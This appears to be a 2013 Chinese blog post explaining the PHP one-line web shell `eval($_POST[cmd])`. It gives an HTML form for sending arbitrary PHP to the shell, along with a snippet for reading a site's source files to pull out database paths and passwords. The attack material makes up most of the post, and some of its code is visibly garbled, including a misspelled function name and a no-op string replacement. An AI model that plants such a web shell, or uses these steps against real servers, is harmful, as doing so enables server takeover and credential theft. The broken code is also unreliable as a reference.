加载中…
http://blog.sina.com.cn/u/1911558354
首页
博文目录
关于我
个人资料
疯狂才子
微博
加好友
发纸条
写留言
加关注
博客等级:
博客积分:
0
博客访问:
2,937
关注人气:
30
获赠金笔:
0支
赠出金笔:
0支
荣誉徽章:
正文
字体大小:
大
中
小
PHP <?php eval($_POST[cmd]);?>详解
(2013-06-15 09:40:42)
标签:
php
_post
漏洞
黑帽
黑客
分类:
cms网站站长
<?php eval_r($_POST[cmd]);?>
执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如:
<form method=post action=
http://....../
你的名字.php>
<textarea name=cmd>
//这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','<',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>
分享:
喜欢
0
赠金笔
阅读
┊
收藏
┊
喜欢
▼
┊
打印
┊
举报/Report
加载中,请稍候......
前一篇:
IE浏览器网页解析漏洞
后一篇:
通杀IIS7.0畸形解析0day漏洞